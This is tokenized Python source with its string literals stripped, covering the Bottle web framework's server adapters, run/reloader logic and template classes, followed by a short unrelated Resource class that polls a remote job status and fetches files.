sys . modules . get ( '<STR_LIT:__main__>' ) <EOL> if module and not hasattr ( module , '<STR_LIT>' ) : <EOL> module . main = lambda : util . run_wsgi_app ( handler ) <EOL> util . run_wsgi_app ( handler ) <EOL> class TwistedServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from twisted . web import server , wsgi <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . internet import reactor <EOL> thread_pool = ThreadPool ( ) <EOL> thread_pool . start ( ) <EOL> reactor . addSystemEventTrigger ( '<STR_LIT>' , '<STR_LIT>' , thread_pool . stop ) <EOL> factory = server . Site ( wsgi . WSGIResource ( reactor , thread_pool , handler ) ) <EOL> reactor . listenTCP ( self . port , factory , interface = self . host ) <EOL> reactor . run ( ) <EOL> class DieselServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from diesel . protocols . wsgi import WSGIApplication <EOL> app = WSGIApplication ( handler , port = self . 
port ) <EOL> app . run ( ) <EOL> class GeventServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from gevent import wsgi as wsgi_fast , pywsgi , monkey , local <EOL> if self . options . get ( '<STR_LIT>' , True ) : <EOL> if not threading . local is local . local : monkey . patch_all ( ) <EOL> wsgi = wsgi_fast if self . options . get ( '<STR_LIT>' ) else pywsgi <EOL> log = None if self . quiet else '<STR_LIT:default>' <EOL> wsgi . WSGIServer ( ( self . host , self . port ) , handler , log = log ) . serve_forever ( ) <EOL> class GunicornServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from gunicorn . app . base import Application <EOL> config = { '<STR_LIT>' : "<STR_LIT>" % ( self . host , int ( self . port ) ) } <EOL> config . update ( self . options ) <EOL> class GunicornApplication ( Application ) : <EOL> def init ( self , parser , opts , args ) : <EOL> return config <EOL> def load ( self ) : <EOL> return handler <EOL> GunicornApplication ( ) . run ( ) <EOL> class EventletServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from eventlet import wsgi , listen <EOL> try : <EOL> wsgi . server ( listen ( ( self . host , self . port ) ) , handler , <EOL> log_output = ( not self . quiet ) ) <EOL> except TypeError : <EOL> wsgi . server ( listen ( ( self . host , self . port ) ) , handler ) <EOL> class RocketServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from rocket import Rocket <EOL> server = Rocket ( ( self . host , self . port ) , '<STR_LIT>' , { '<STR_LIT>' : handler } ) <EOL> server . start ( ) <EOL> class BjoernServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> from bjoern import run <EOL> run ( handler , self . host , self . 
port ) <EOL> class AutoServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> adapters = [ WaitressServer , PasteServer , TwistedServer , CherryPyServer , WSGIRefServer ] <EOL> def run ( self , handler ) : <EOL> for sa in self . adapters : <EOL> try : <EOL> return sa ( self . host , self . port , ** self . options ) . run ( handler ) <EOL> except ImportError : <EOL> pass <EOL> server_names = { <EOL> '<STR_LIT>' : CGIServer , <EOL> '<STR_LIT>' : FlupFCGIServer , <EOL> '<STR_LIT>' : WSGIRefServer , <EOL> '<STR_LIT>' : WaitressServer , <EOL> '<STR_LIT>' : CherryPyServer , <EOL> '<STR_LIT>' : PasteServer , <EOL> '<STR_LIT>' : FapwsServer , <EOL> '<STR_LIT>' : TornadoServer , <EOL> '<STR_LIT>' : AppEngineServer , <EOL> '<STR_LIT>' : TwistedServer , <EOL> '<STR_LIT>' : DieselServer , <EOL> '<STR_LIT>' : MeinheldServer , <EOL> '<STR_LIT>' : GunicornServer , <EOL> '<STR_LIT>' : EventletServer , <EOL> '<STR_LIT>' : GeventServer , <EOL> '<STR_LIT>' : RocketServer , <EOL> '<STR_LIT>' : BjoernServer , <EOL> '<STR_LIT>' : AutoServer , <EOL> } <EOL> def load ( target , ** namespace ) : <EOL> """<STR_LIT>""" <EOL> module , target = target . split ( "<STR_LIT::>" , <NUM_LIT:1> ) if '<STR_LIT::>' in target else ( target , None ) <EOL> if module not in sys . modules : __import__ ( module ) <EOL> if not target : return sys . modules [ module ] <EOL> if target . isalnum ( ) : return getattr ( sys . modules [ module ] , target ) <EOL> package_name = module . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> namespace [ package_name ] = sys . modules [ package_name ] <EOL> return eval ( '<STR_LIT>' % ( module , target ) , namespace ) <EOL> def load_app ( target ) : <EOL> """<STR_LIT>""" <EOL> global NORUN ; NORUN , nr_old = True , NORUN <EOL> try : <EOL> tmp = default_app . push ( ) <EOL> rv = load ( target ) <EOL> return rv if callable ( rv ) else tmp <EOL> finally : <EOL> default_app . 
remove ( tmp ) <EOL> NORUN = nr_old <EOL> _debug = debug <EOL> def run ( app = None , server = '<STR_LIT>' , host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , <EOL> interval = <NUM_LIT:1> , reloader = False , quiet = False , plugins = None , <EOL> debug = False , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> if NORUN : return <EOL> if reloader and not os . environ . get ( '<STR_LIT>' ) : <EOL> try : <EOL> lockfile = None <EOL> fd , lockfile = tempfile . mkstemp ( prefix = '<STR_LIT>' , suffix = '<STR_LIT>' ) <EOL> os . close ( fd ) <EOL> while os . path . exists ( lockfile ) : <EOL> args = [ sys . executable ] + sys . argv <EOL> environ = os . environ . copy ( ) <EOL> environ [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> environ [ '<STR_LIT>' ] = lockfile <EOL> p = subprocess . Popen ( args , env = environ ) <EOL> while p . poll ( ) is None : <EOL> os . utime ( lockfile , None ) <EOL> time . sleep ( interval ) <EOL> if p . poll ( ) != <NUM_LIT:3> : <EOL> if os . path . exists ( lockfile ) : os . unlink ( lockfile ) <EOL> sys . exit ( p . poll ( ) ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> finally : <EOL> if os . path . exists ( lockfile ) : <EOL> os . unlink ( lockfile ) <EOL> return <EOL> try : <EOL> _debug ( debug ) <EOL> app = app or default_app ( ) <EOL> if isinstance ( app , basestring ) : <EOL> app = load_app ( app ) <EOL> if not callable ( app ) : <EOL> raise ValueError ( "<STR_LIT>" % app ) <EOL> for plugin in plugins or [ ] : <EOL> app . install ( plugin ) <EOL> if server in server_names : <EOL> server = server_names . get ( server ) <EOL> if isinstance ( server , basestring ) : <EOL> server = load ( server ) <EOL> if isinstance ( server , type ) : <EOL> server = server ( host = host , port = port , ** kargs ) <EOL> if not isinstance ( server , ServerAdapter ) : <EOL> raise ValueError ( "<STR_LIT>" % server ) <EOL> server . quiet = server . quiet or quiet <EOL> if not server . 
quiet : <EOL> _stderr ( "<STR_LIT>" % ( __version__ , repr ( server ) ) ) <EOL> _stderr ( "<STR_LIT>" % ( server . host , server . port ) ) <EOL> _stderr ( "<STR_LIT>" ) <EOL> if reloader : <EOL> lockfile = os . environ . get ( '<STR_LIT>' ) <EOL> bgcheck = FileCheckerThread ( lockfile , interval ) <EOL> with bgcheck : <EOL> server . run ( app ) <EOL> if bgcheck . status == '<STR_LIT>' : <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> else : <EOL> server . run ( app ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> except ( SystemExit , MemoryError ) : <EOL> raise <EOL> except : <EOL> if not reloader : raise <EOL> if not getattr ( server , '<STR_LIT>' , quiet ) : <EOL> print_exc ( ) <EOL> time . sleep ( interval ) <EOL> sys . exit ( <NUM_LIT:3> ) <EOL> class FileCheckerThread ( threading . Thread ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , lockfile , interval ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . lockfile , self . interval = lockfile , interval <EOL> self . status = None <EOL> def run ( self ) : <EOL> exists = os . path . exists <EOL> mtime = lambda path : os . stat ( path ) . st_mtime <EOL> files = dict ( ) <EOL> for module in list ( sys . modules . values ( ) ) : <EOL> path = getattr ( module , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if path [ - <NUM_LIT:4> : ] in ( '<STR_LIT>' , '<STR_LIT>' ) : path = path [ : - <NUM_LIT:1> ] <EOL> if path and exists ( path ) : files [ path ] = mtime ( path ) <EOL> while not self . status : <EOL> if not exists ( self . lockfile ) or mtime ( self . lockfile ) < time . time ( ) - self . interval - <NUM_LIT:5> : <EOL> self . status = '<STR_LIT:error>' <EOL> thread . interrupt_main ( ) <EOL> for path , lmtime in list ( files . items ( ) ) : <EOL> if not exists ( path ) or mtime ( path ) > lmtime : <EOL> self . status = '<STR_LIT>' <EOL> thread . interrupt_main ( ) <EOL> break <EOL> time . sleep ( self . interval ) <EOL> def __enter__ ( self ) : <EOL> self . 
start ( ) <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if not self . status : self . status = '<STR_LIT>' <EOL> self . join ( ) <EOL> return exc_type is not None and issubclass ( exc_type , KeyboardInterrupt ) <EOL> class TemplateError ( HTTPError ) : <EOL> def __init__ ( self , message ) : <EOL> HTTPError . __init__ ( self , <NUM_LIT> , message ) <EOL> class BaseTemplate ( object ) : <EOL> """<STR_LIT>""" <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> settings = { } <EOL> defaults = { } <EOL> def __init__ ( self , source = None , name = None , lookup = [ ] , encoding = '<STR_LIT:utf8>' , ** settings ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . source = source . read ( ) if hasattr ( source , '<STR_LIT>' ) else source <EOL> self . filename = source . filename if hasattr ( source , '<STR_LIT:filename>' ) else None <EOL> self . lookup = [ os . path . abspath ( x ) for x in lookup ] <EOL> self . encoding = encoding <EOL> self . settings = self . settings . copy ( ) <EOL> self . settings . update ( settings ) <EOL> if not self . source and self . name : <EOL> self . filename = self . search ( self . name , self . lookup ) <EOL> if not self . filename : <EOL> raise TemplateError ( '<STR_LIT>' % repr ( name ) ) <EOL> if not self . source and not self . filename : <EOL> raise TemplateError ( '<STR_LIT>' ) <EOL> self . prepare ( ** self . settings ) <EOL> @ classmethod <EOL> def search ( cls , name , lookup = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isfile ( name ) : return name <EOL> for spath in lookup : <EOL> fname = os . path . join ( spath , name ) <EOL> if os . path . isfile ( fname ) : <EOL> return fname <EOL> for ext in cls . extensions : <EOL> if os . path . isfile ( '<STR_LIT>' % ( fname , ext ) ) : <EOL> return '<STR_LIT>' % ( fname , ext ) <EOL> @ classmethod <EOL> def global_config ( cls , key , * args ) : <EOL> '''<STR_LIT>''' <EOL> if args : <EOL> cls . 
settings = cls . settings . copy ( ) <EOL> cls . settings [ key ] = args [ <NUM_LIT:0> ] <EOL> else : <EOL> return cls . settings [ key ] <EOL> def prepare ( self , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def render ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class MakoTemplate ( BaseTemplate ) : <EOL> def prepare ( self , ** options ) : <EOL> from mako . template import Template <EOL> from mako . lookup import TemplateLookup <EOL> options . update ( { '<STR_LIT>' : self . encoding } ) <EOL> options . setdefault ( '<STR_LIT>' , bool ( DEBUG ) ) <EOL> lookup = TemplateLookup ( directories = self . lookup , ** options ) <EOL> if self . source : <EOL> self . tpl = Template ( self . source , lookup = lookup , ** options ) <EOL> else : <EOL> self . tpl = Template ( uri = self . name , filename = self . filename , lookup = lookup , ** options ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> _defaults = self . defaults . copy ( ) <EOL> _defaults . update ( kwargs ) <EOL> return self . tpl . render ( ** _defaults ) <EOL> class CheetahTemplate ( BaseTemplate ) : <EOL> def prepare ( self , ** options ) : <EOL> from Cheetah . Template import Template <EOL> self . context = threading . local ( ) <EOL> self . context . vars = { } <EOL> options [ '<STR_LIT>' ] = [ self . context . vars ] <EOL> if self . source : <EOL> self . tpl = Template ( source = self . source , ** options ) <EOL> else : <EOL> self . tpl = Template ( file = self . filename , ** options ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> self . context . vars . update ( self . defaults ) <EOL> self . context . vars . update ( kwargs ) <EOL> out = str ( self . tpl ) <EOL> self . context . vars . 
clear ( ) <EOL> return out <EOL> class Jinja2Template ( BaseTemplate ) : <EOL> def prepare ( self , filters = None , tests = None , ** kwargs ) : <EOL> from jinja2 import Environment , FunctionLoader <EOL> if '<STR_LIT>' in kwargs : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . env = Environment ( loader = FunctionLoader ( self . loader ) , ** kwargs ) <EOL> if filters : self . env . filters . update ( filters ) <EOL> if tests : self . env . tests . update ( tests ) <EOL> if self . source : <EOL> self . tpl = self . env . from_string ( self . source ) <EOL> else : <EOL> self . tpl = self . env . get_template ( self . filename ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> _defaults = self . defaults . copy ( ) <EOL> _defaults . update ( kwargs ) <EOL> return self . tpl . render ( ** _defaults ) <EOL> def loader ( self , name ) : <EOL> fname = self . search ( name , self . lookup ) <EOL> if not fname : return <EOL> with open ( fname , "<STR_LIT:rb>" ) as f : <EOL> return f . read ( ) . decode ( self . encoding ) <EOL> class SimpleTALTemplate ( BaseTemplate ) : <EOL> '''<STR_LIT>''' <EOL> def prepare ( self , ** options ) : <EOL> depr ( '<STR_LIT>' '<STR_LIT>' ) <EOL> from simpletal import simpleTAL <EOL> if self . source : <EOL> self . tpl = simpleTAL . compileHTMLTemplate ( self . source ) <EOL> else : <EOL> with open ( self . filename , '<STR_LIT:rb>' ) as fp : <EOL> self . tpl = simpleTAL . compileHTMLTemplate ( tonat ( fp . read ( ) ) ) <EOL> def render ( self , * args , ** kwargs ) : <EOL> from simpletal import simpleTALES <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> context = simpleTALES . Context ( ) <EOL> for k , v in self . defaults . items ( ) : <EOL> context . addGlobal ( k , v ) <EOL> for k , v in kwargs . items ( ) : <EOL> context . addGlobal ( k , v ) <EOL> output = StringIO ( ) <EOL> self . tpl . 
expand ( context , output ) <EOL> return output . getvalue ( ) <EOL> class SimpleTemplate ( BaseTemplate ) : <EOL> blocks = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' ) <EOL> dedent_blocks = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ lazy_attribute <EOL> def re_pytokens ( cls ) : <EOL> '''<STR_LIT>''' <EOL> return re . compile ( r'''<STR_LIT>''' , re . VERBOSE ) <EOL> def prepare ( self , escape_func = html_escape , noescape = False , ** kwargs ) : <EOL> self . cache = { } <EOL> enc = self . encoding <EOL> self . _str = lambda x : touni ( x , enc ) <EOL> self . _escape = lambda x : escape_func ( touni ( x , enc ) ) <EOL> if noescape : <EOL> self . _str , self . _escape = self . _escape , self . _str <EOL> @ classmethod <EOL> def split_comment ( cls , code ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:#>' not in code : return code <EOL> subf = lambda m : '<STR_LIT>' if m . group ( <NUM_LIT:0> ) [ <NUM_LIT:0> ] == '<STR_LIT:#>' else m . group ( <NUM_LIT:0> ) <EOL> return re . sub ( cls . re_pytokens , subf , code ) <EOL> @ cached_property <EOL> def co ( self ) : <EOL> return compile ( self . code , self . filename or '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ cached_property <EOL> def code ( self ) : <EOL> stack = [ ] <EOL> lineno = <NUM_LIT:0> <EOL> ptrbuffer = [ ] <EOL> codebuffer = [ ] <EOL> multiline = dedent = oneline = False <EOL> template = self . source or open ( self . filename , '<STR_LIT:rb>' ) . read ( ) <EOL> def yield_tokens ( line ) : <EOL> for i , part in enumerate ( re . split ( r'<STR_LIT>' , line ) ) : <EOL> if i % <NUM_LIT:2> : <EOL> if part . 
startswith ( '<STR_LIT:!>' ) : yield '<STR_LIT>' , part [ <NUM_LIT:1> : ] <EOL> else : yield '<STR_LIT>' , part <EOL> else : yield '<STR_LIT>' , part <EOL> def flush ( ) : <EOL> if not ptrbuffer : return <EOL> cline = '<STR_LIT>' <EOL> for line in ptrbuffer : <EOL> for token , value in line : <EOL> if token == '<STR_LIT>' : cline += repr ( value ) <EOL> elif token == '<STR_LIT>' : cline += '<STR_LIT>' % value <EOL> elif token == '<STR_LIT>' : cline += '<STR_LIT>' % value <EOL> cline += '<STR_LIT:U+002CU+0020>' <EOL> cline = cline [ : - <NUM_LIT:2> ] + '<STR_LIT>' <EOL> cline = cline [ : - <NUM_LIT:2> ] <EOL> if cline [ : - <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> cline = cline [ : - <NUM_LIT:7> ] + cline [ - <NUM_LIT:1> ] <EOL> cline = '<STR_LIT>' + cline + '<STR_LIT>' <EOL> del ptrbuffer [ : ] <EOL> code ( cline ) <EOL> def code ( stmt ) : <EOL> for line in stmt . splitlines ( ) : <EOL> codebuffer . append ( '<STR_LIT:U+0020>' * len ( stack ) + line . strip ( ) ) <EOL> for line in template . splitlines ( True ) : <EOL> lineno += <NUM_LIT:1> <EOL> line = touni ( line , self . encoding ) <EOL> sline = line . lstrip ( ) <EOL> if lineno <= <NUM_LIT:2> : <EOL> m = re . match ( r"<STR_LIT>" , sline ) <EOL> if m : self . encoding = m . group ( <NUM_LIT:1> ) <EOL> if m : line = line . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sline and sline [ <NUM_LIT:0> ] == '<STR_LIT:%>' and sline [ : <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> line = line . split ( '<STR_LIT:%>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] . lstrip ( ) <EOL> cline = self . split_comment ( line ) . strip ( ) <EOL> cmd = re . split ( r'<STR_LIT>' , cline ) [ <NUM_LIT:0> ] <EOL> flush ( ) <EOL> if cmd in self . blocks or multiline : <EOL> cmd = multiline or cmd <EOL> dedent = cmd in self . dedent_blocks <EOL> if dedent and not oneline and not multiline : <EOL> cmd = stack . pop ( ) <EOL> code ( line ) <EOL> oneline = not cline . endswith ( '<STR_LIT::>' ) <EOL> multiline = cmd if cline . 
endswith ( '<STR_LIT:\\>' ) else False <EOL> if not oneline and not multiline : <EOL> stack . append ( cmd ) <EOL> elif cmd == '<STR_LIT:end>' and stack : <EOL> code ( '<STR_LIT>' % ( stack . pop ( ) , line . strip ( ) [ <NUM_LIT:3> : ] ) ) <EOL> elif cmd == '<STR_LIT>' : <EOL> p = cline . split ( None , <NUM_LIT:2> ) [ <NUM_LIT:1> : ] <EOL> if len ( p ) == <NUM_LIT:2> : <EOL> code ( "<STR_LIT>" % ( repr ( p [ <NUM_LIT:0> ] ) , p [ <NUM_LIT:1> ] ) ) <EOL> elif p : <EOL> code ( "<STR_LIT>" % repr ( p [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> code ( "<STR_LIT>" ) <EOL> elif cmd == '<STR_LIT>' : <EOL> p = cline . split ( None , <NUM_LIT:2> ) [ <NUM_LIT:1> : ] <EOL> if len ( p ) == <NUM_LIT:2> : <EOL> code ( "<STR_LIT>" % ( repr ( p [ <NUM_LIT:0> ] ) , p [ <NUM_LIT:1> ] ) ) <EOL> elif p : <EOL> code ( "<STR_LIT>" % repr ( p [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> code ( line ) <EOL> else : <EOL> if line . strip ( ) . startswith ( '<STR_LIT>' ) : <EOL> line = line . replace ( '<STR_LIT>' , '<STR_LIT:%>' , <NUM_LIT:1> ) <EOL> ptrbuffer . append ( yield_tokens ( line ) ) <EOL> flush ( ) <EOL> return '<STR_LIT:\n>' . join ( codebuffer ) + '<STR_LIT:\n>' <EOL> def subtemplate ( self , _name , _stdout , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> if _name not in self . cache : <EOL> self . cache [ _name ] = self . __class__ ( name = _name , lookup = self . lookup ) <EOL> return self . cache [ _name ] . execute ( _stdout , kwargs ) <EOL> def execute ( self , _stdout , * args , ** kwargs ) : <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> env = self . defaults . copy ( ) <EOL> env . update ( { '<STR_LIT>' : _stdout , '<STR_LIT>' : _stdout . extend , <EOL> '<STR_LIT>' : self . subtemplate , '<STR_LIT>' : self . _str , <EOL> '<STR_LIT>' : self . _escape , '<STR_LIT>' : env . get , <EOL> '<STR_LIT>' : env . setdefault , '<STR_LIT>' : env . __contains__ } ) <EOL> env . update ( kwargs ) <EOL> eval ( self . 
co , env ) <EOL> if '<STR_LIT>' in env : <EOL> subtpl , rargs = env [ '<STR_LIT>' ] <EOL> rargs [ '<STR_LIT>' ] = _stdout [ : ] <EOL> del _stdout [ : ] <EOL> return self . subtemplate ( subtpl , _stdout , rargs ) <EOL> return env <EOL> def render ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for dictarg in args : kwargs . update ( dictarg ) <EOL> stdout = [ ] <EOL> self . execute ( stdout , kwargs ) <EOL> return '<STR_LIT>' . join ( stdout ) <EOL> def template ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> tpl = args [ <NUM_LIT:0> ] if args else None <EOL> template_adapter = kwargs . pop ( '<STR_LIT>' , SimpleTemplate ) <EOL> if tpl not in TEMPLATES or DEBUG : <EOL> settings = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> lookup = kwargs . pop ( '<STR_LIT>' , TEMPLATE_PATH ) <EOL> if isinstance ( tpl , template_adapter ) : <EOL> TEMPLATES [ tpl ] = tpl <EOL> if settings : TEMPLATES [ tpl ] . prepare ( ** settings ) <EOL> elif "<STR_LIT:\n>" in tpl or "<STR_LIT:{>" in tpl or "<STR_LIT:%>" in tpl or '<STR_LIT:$>' in tpl : <EOL> TEMPLATES [ tpl ] = template_adapter ( source = tpl , lookup = lookup , ** settings ) <EOL> else : <EOL> TEMPLATES [ tpl ] = template_adapter ( name = tpl , lookup = lookup , ** settings ) <EOL> if not TEMPLATES [ tpl ] : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % tpl ) <EOL> for dictarg in args [ <NUM_LIT:1> : ] : kwargs . update ( dictarg ) <EOL> return TEMPLATES [ tpl ] . render ( kwargs ) <EOL> mako_template = functools . partial ( template , template_adapter = MakoTemplate ) <EOL> cheetah_template = functools . partial ( template , template_adapter = CheetahTemplate ) <EOL> jinja2_template = functools . partial ( template , template_adapter = Jinja2Template ) <EOL> simpletal_template = functools . partial ( template , template_adapter = SimpleTALTemplate ) <EOL> def view ( tpl_name , ** defaults ) : <EOL> '''<STR_LIT>''' <EOL> def decorator ( func ) : <EOL> @ functools . 
wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> result = func ( * args , ** kwargs ) <EOL> if isinstance ( result , ( dict , DictMixin ) ) : <EOL> tplvars = defaults . copy ( ) <EOL> tplvars . update ( result ) <EOL> return template ( tpl_name , ** tplvars ) <EOL> return result <EOL> return wrapper <EOL> return decorator <EOL> mako_view = functools . partial ( view , template_adapter = MakoTemplate ) <EOL> cheetah_view = functools . partial ( view , template_adapter = CheetahTemplate ) <EOL> jinja2_view = functools . partial ( view , template_adapter = Jinja2Template ) <EOL> simpletal_view = functools . partial ( view , template_adapter = SimpleTALTemplate ) <EOL> TEMPLATE_PATH = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> TEMPLATES = { } <EOL> DEBUG = False <EOL> NORUN = False <EOL> HTTP_CODES = httplib . responses <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> HTTP_CODES [ <NUM_LIT> ] = "<STR_LIT>" <EOL> _HTTP_STATUS_LINES = dict ( ( k , '<STR_LIT>' % ( k , v ) ) for ( k , v ) in HTTP_CODES . items ( ) ) <EOL> ERROR_PAGE_TEMPLATE = """<STR_LIT>""" % __name__ <EOL> request = LocalRequest ( ) <EOL> response = LocalResponse ( ) <EOL> local = threading . local ( ) <EOL> app = default_app = AppStack ( ) <EOL> app . push ( ) <EOL> ext = _ImportRedirect ( __name__ + '<STR_LIT>' , '<STR_LIT>' ) . module <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> opt , args , parser = _cmd_options , _cmd_args , _cmd_parser <EOL> if opt . version : <EOL> _stdout ( '<STR_LIT>' % __version__ ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not args : <EOL> parser . print_help ( ) <EOL> _stderr ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> sys . modules . setdefault ( '<STR_LIT>' , sys . modules [ '<STR_LIT:__main__>' ] ) <EOL> host , port = ( opt . 
bind or '<STR_LIT:localhost>' ) , <NUM_LIT> <EOL> if '<STR_LIT::>' in host : <EOL> host , port = host . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> run ( args [ <NUM_LIT:0> ] , host = host , port = port , server = opt . server , <EOL> reloader = opt . reload , plugins = opt . plugin , debug = opt . debug ) </s>
<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import datetime <EOL> import os <EOL> import shutil <EOL> import time <EOL> class Resource : <EOL> """<STR_LIT>""" <EOL> _STATE_UPDATE_INTERVAL = datetime . timedelta ( seconds = <NUM_LIT:0.5> ) <EOL> def __init__ ( self , id , conn ) : <EOL> """<STR_LIT>""" <EOL> self . _id = id <EOL> self . _conn = conn <EOL> self . _last_updated = datetime . datetime . min <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _id <EOL> def is_pending ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _pending <EOL> def is_running ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _running <EOL> def has_finished ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _finished <EOL> def has_succeeded ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _finished <EOL> def has_failed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _failed <EOL> def get_error ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _update_state_if_needed ( ) <EOL> return self . _error <EOL> def _update_state_if_needed ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state_should_be_updated ( ) : <EOL> self . _update_state ( ) <EOL> def _state_should_be_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . datetime . now ( ) <EOL> return ( now - self . _last_updated ) > self . _STATE_UPDATE_INTERVAL <EOL> def _wait_until_state_can_be_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( self . _STATE_UPDATE_INTERVAL . total_seconds ( ) ) <EOL> def _update_state ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . _get_status ( ) <EOL> self . _pending = status [ '<STR_LIT>' ] <EOL> self . _running = status [ '<STR_LIT>' ] <EOL> self . _finished = status [ '<STR_LIT>' ] <EOL> self . 
_succeeded = status [ '<STR_LIT>' ] <EOL> self . _failed = status [ '<STR_LIT>' ] <EOL> self . _error = status [ '<STR_LIT:error>' ] <EOL> self . _last_updated = datetime . datetime . now ( ) <EOL> return status <EOL> def _get_status ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _conn . send_get_request ( '<STR_LIT>' . format ( self . id ) ) <EOL> def _handle_failure ( self , on_failure , error ) : <EOL> """<STR_LIT>""" <EOL> if on_failure is not None : <EOL> obj = on_failure ( error ) <EOL> if isinstance ( obj , Exception ) : <EOL> raise obj <EOL> def _get_file_contents ( self , file_path , is_text_file ) : <EOL> """<STR_LIT>""" <EOL> with contextlib . closing ( self . _conn . get_file ( file_path ) ) as file : <EOL> contents = file . read ( ) <EOL> if is_text_file : <EOL> contents = contents . decode ( ) <EOL> return contents <EOL> def _get_file_and_save_it_to ( self , file_path , directory = None ) : <EOL> """<STR_LIT>""" <EOL> directory = directory or os . getcwd ( ) <EOL> with contextlib . closing ( self . _conn . get_file ( file_path ) ) as src : <EOL> dst_path = os . path . join ( directory , src . name ) <EOL> with open ( dst_path , '<STR_LIT:wb>' ) as dst : <EOL> shutil . copyfileobj ( src , dst ) <EOL> return dst_path </s>
